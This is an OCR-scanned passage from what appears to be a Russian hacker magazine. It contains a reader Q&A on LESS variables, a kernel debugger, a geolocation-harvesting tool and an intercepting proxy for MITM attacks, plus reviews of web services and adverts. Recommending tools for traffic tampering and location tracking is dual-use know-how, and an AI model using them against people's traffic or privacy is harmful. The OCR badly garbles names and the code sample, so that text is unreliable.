О: Есть ли какая-то возможность ис- 
пользовать в разметке С55 перемен- 
ные? Скажем, присвоить в качестве 
значения некой переменной цвет или 
отступ, а затем использовать ее, изме- 
няя в случае необходимости? 

А: Специально для этого были разработаны 
такие инструменты, какЭазз ( зазз-іапд.сот ) и 
бЕЭЭ ( Іеззсзз.огд ). Они очень похожи и добав- 
ляют к пресловутому С55 динамические эле- 
менты вроде переменных, операторов и функ- 
ций. Какбраузер может их обработать? Очень 
просто: стили, написанные с помощью, скажем, 
І_Е55, компилируются в самый обычный 055, с 
которым у браузера сложностей не возникает. 
Вотта к выглядит код на І_Е55, использующий 
переменные (обозначаются через И): 

@1:Ііе-ЬогсІег: Ірх; 

(ЭЬазе-соІог: #111; 

#ЬеасІег { 

соіог: (ЭЬазе-соІог * 3; 

Ьогсіег-Іе-Рі:: @1:Ііе-ЬогсІег; 

ЬогсІег-гі§Ы:: @1:Ме - Ьопсіеп * 2; 

} 

#Тоо1:ег { 

соіог: (ЭЬазе-соІог + #003300; 

} 

А вотта к он выглядит после компиляции: 

#ЬеасІег { 

соіог: #333; 

Ьогсіег-Іе-Рі:: Ірх; 

ЬогсІег-гі^Ы:: 2рх; 

} 

#Тоо1:ег { 



соіог: #114411; 

} 

С обработкой обычного 055 проблему браузе- 
ра уже тем более не возникнет. 

О: Подскажите нормальный отладчик 
для ядра ѴУ/іпсІоѵѵз х64! 

А: Когда дело доходит до ѴѴіпсІоѵѵз 7 х64, то 
возможности существующих отладчиков 
ядра действительно весьма ограничены. 
Интересная разработка, которую мы недавно 
нашли, — дебаггер ѵігІбЬд ( сосіе.доодіе. 
сот/р/ѵігФЬд ). Он использует технологи и 
аппаратной виртуализации железа, а именно 
Іпіеі (ѴТ-х), и это главная его фишка. Хорошая 
новость втом, что такой подход позволяет 
обойти ряд ограничений. Плохая — проект 
еще очень молодой, поэтому неудивляйся 
возможным В5СЮ’ам. 

О: Твержу всем друзьям, что но- 
вые геолокационные возможности 
веб — это зло. Мало того, что люди 
добровольно отмечают место своего 
пребывания (через сервисы вроде 
Роигециаге), так еще и любая веб- 
страница теперь может определить 
месторасположение посетителя. Под- 
держите меня :). 

А: Судить, хорошо это или плохо, мы не будем. 
Лично мне все эти новыефишки нравятся. Но 
чтобы убедить друзей быть более вниматель- 
ными к сохранению своей частной жизни, мо- 
жешь показать им утилиту сгееру ( дііЬиЬ.сот/ 
ііекіхорбп/сгеерѵ ). Это приложение, которое 
позволяет собирать связанную с геолокацией 
информацию о пользователях из различных 
сервисов: 

• местоположение изтвитов; 

• геолокационная информация, доступная 
через хостинги изображений с поддержкой 
соответствующего АРІ ; 

• ЕХІЕ-теги из фотографий. 

Извлеченные данные представляются на карте 
и сопровождаются комментариями. Возможно 
для кого-то та кая «карта жизни» ста нет от- 
кровением. 

О: Какую перехватывающую прокси 
использовал бы взломщик, если бы 
ему удалось реализовать атаку МІТМ? 
Желательно, чтобы была возможность 
подмены пакетов. 

А: Отличным вариантом будет Наікіі; Ргоху 
Рго]ес1 ( Ыиу/баікіі ). Вот несколько причин: 
•удобный ООП -интерфей с, позволяющий вы- 
полнить ручное редактирование пакетов ТСР/ 
НТТР-трафика; 

• логированиетрафика в базу данных 
МопдойВ с вытекающими возможностями 
для автоматического анализа и продвинутого 
поиска; 

• классная визуализация НТТР-трафика с под- 
светкой синтаксиса, ІЗС 
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ОТЧЕТ С ХАКЕРСКОГО КОНТЕСТА 




I 










СЮ1Ю9 ЮЕ 

с!оисІ9ісІе.сот 

©Эта среда разработки для веб-программистов, специализирующих- 
ся на ЭаѵаЗсгірІ;. История простая: попробовав различные вариации 
Есіірзе и другие известные ЮЕ для баѵа и С++, создатели осознали, что 
функционал для веб-разработки в этих продуктах реализован таксебе, 
скорее какдополнительная фича. Этот факт и положил начало созданию 
специальной среды для работы над проектами, построенными на 
баѵаЭсгірЕ Уже сейчас СІоисІ9 ЮЕ предлагаетудобнейший редактор 
кода с анализатором синтаксиса для поиска ошибок на лету, отладчике 
возможностью установки ѵѵаЮЬ’ей для просмотра значения перемен- 
ных, классные опции коллективной работы, прозрачную интеграцию с 
системой контроля версий и хостинга кода ОііНиЬ. 





Синхронизация файлов 
между компьютерами 
с принудительным 
шифрованием 



ѴѴІІАІ.А 

ѵѵиаіа.сот 

© Всякий раз, забрасывая в свой аккаунт ОгорЬох’а конфиденциаль- 
ные данные (вроде скана паспорта, который часто нужен для покупки 
билетов), я невольно задумываюсь о степени их приватности. Синхро- 
низация файлов между разными компьютерами и даже мобильными 
устройствами — фича, без которой я уже не могу обойтись. Но насколько 
эти файлы защищены? Сервис ѴѴиаІа предоставляетте же самые воз- 
можности, что и ОгорЬох, но при этом изначально разработан с расчетом 
на безопасность данных. Все файлы также хранятся в облаке, но в за- 
криптованном виде, а операции шифрования/дешифрования осущест- 
вляются исключительно на клиентских компьютерах. При этом ключ для 
выполнения этих операций никогда не передается на сервер. 



оиррѵ 

аІІКу.сот 

©Чтобы нарисовать блок-схему алгоритма, ІЛѴЮ-диаграммы нового 
программного проекта или топологию локальной сети, я всегда исполь- 
зовал Місгозоіі: Ѵізіо. Теперьже в большинстве случаев удается обойтись 
без этого платного продукта, заюзав сервис ОІЮу. Прелести онлайновой 
реализации нетолько втом, что инструмент можно использовать везде и 
всегда (нужен только браузер), но и в мощном функционале для совмест- 
ной работы, системе контроля версий, фиксирующей все изменения, 
а также возможности быстро опубликовать нужный документ для всех 
желающих. Сервис платный, но даже упрощенной версии более чем до- 
статочно для большинства задач. 




ЬЬ 



Удобная система для 
комментирования 



нодтшэй мосадесвдо центра^ документов и 

графического 



<6 

т 



іі 



ІШДУІ ы 



материала 



своссюос 

сгососіос.сот 

©Дизайн интерфейса приложения, техническое задание на разра- 
ботку, манул по АРІ-системам и многие другие документы нередко при- 
ходится обсуждать с коллегами по цеху во время работы над проектом. 
Инструмент сгособос позволяет выполнить одну очень важную вещь: 
наглядно комментировать любой графический файл или текстовый 
документ (прежде всего, РОЕ) с помощью различных текстовых и гра- 
фических пометок. Можно, к примеру, взять черновой макет сайта от 
дизайнера ипрямонанем быстро добавить комментарии по проблем- 
ным местам, которые не нравятся. То же самое касается и текстовых 
документов. По сути, это универсальный инструмент для рецензирова- 
ния, реализующий функционал ѴѴогсГа и АсгоЬаЕа. 
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Покупай напрямую 
в редакции по 90 рублей 

за номер 




взлом 

ѴОІР 

ПОИСК И АТАКА 
ѴОІР-ШЛЮЗОВ 

СТР. 60 



РНКЕАШ6 

ВОЗВРАЩЕНИЕ ЛЕГЕНДАРНОЙ РУБРИКИ ст , 13 о 





Взлом Ыпих через ІІЗВ-флешку 
Кеб.ВиІІоп: генератор дорвеев 
Архитектура Тѵѵіііег 
Тест бесплатных антивирусов 
Пишем покерного бота 



УГОН 

ДЕДИКОВ 

М808-067: ВОЛНИСТЫЙ БАГ НА 
СЛУЖБЕ У ВЗЛОМЩИКОВ ѴѴШБОѴѴ5 



Реклама 



ѵѵш.хакер.ги/росІрізка 





Всё серьёзно 









Новый процессор ІпіеІ® Соге™ І5... 

Тонкий дюралюминиевый корпус... 

Революционный экран ЗирегВпдН РІиз*... 

Ничего лишнего. 

Ноутбук Затзипд серии 9. Возможно, лучший ноутбук. 



* Супер Брайт Плюс 



Умная производительность с ускорением. И это видно. 



ІПІѲІ/гтігіе' 



1 

СОЙЕІ5І 






Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ѵѵѵѵѵѵ.затзипд.сот. Товар сертифицирован. Реклама. 



ІпіеІ, логотип ІпіеІ, Іпіеі Іпзісіе, ІпіеІ Соге и Соге Іпзісіе являются товарными знаками корпорации ІпѣеІ на территории США 
и других стран. Для получения дополнительной информации о рейтинге процессоров ІпіеІ посетите сайт ѵѵѵѵѵѵ.іпіеі.ги/гаііпд. 



